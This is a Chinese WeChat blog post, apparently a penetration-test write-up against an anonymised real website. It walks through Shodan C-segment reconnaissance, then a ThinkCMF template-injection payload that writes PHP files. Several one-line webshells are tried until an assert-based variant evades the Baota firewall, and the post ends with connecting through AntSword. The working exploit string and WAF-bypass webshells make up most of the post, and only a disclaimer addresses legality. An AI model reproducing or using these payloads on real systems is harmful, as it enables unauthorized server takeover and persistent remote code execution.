声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系刘一手
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。仅供学习研究
目标站: www.xxx.com
主站测试了没有找到突破口(不过多讲述了)
通过shodan查找旁站和c段
shodan c段语法:net:”127.0.0.0/24″
找到了一个旁站 一个注册网站(在同一个c段里找到的)
目录扫描了一下(御剑后台扫描工具)
发现后台(好家伙,thinkcmf)
尝试了一波弱口令,无果
百度查该cms有无漏洞
https://www.cnblogs.com/0daybug/p/11790619.html
影响范围还挺广的
payload
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>
直接给bt防火墙拦截了(phpinfo()都拦截,哎)
换一个echo 输出看能不能
白屏了,说明没有拦截
访问test.php成功执行
接下来就是绕过宝塔getshell了
尝试一下原始的小马
<?php @eval($_POST[a]);
被拦截了
<?php @eval();
也被拦截了
既然eval()函数无法使用,我们尝试其他的可执行命令的函数?
更换assert()函数
一句话木马·
<?php assert(@$_POST['a']);
也是被拦截了
尝试只留assert()
成功执行(应该是$_POST[]被过滤了)
$_GET[],$_COOKIE[] //都被过滤了
去掉[]进行尝试,可以过,没被拦截,单独的[]也没被拦截
尝试令_POST
<?php $b=$_POST;assert(@$b[a]);
白屏了,应该是过了,访问tets1.php ,那个警告不用管,没报错
执行下phpinfo()
使用蚁剑进行连接
返回数据为空
将编码器改为random,成功连接
over
推荐阅读
信息安全 | 键盘记录之信息窃取(登录框密码隐藏就真的万无一失吗)
python | 用python写了一个谈恋爱AA公式,我被分手了
原文始发于微信公众号(鹏组安全):记一次渗透测试(绕过某塔)
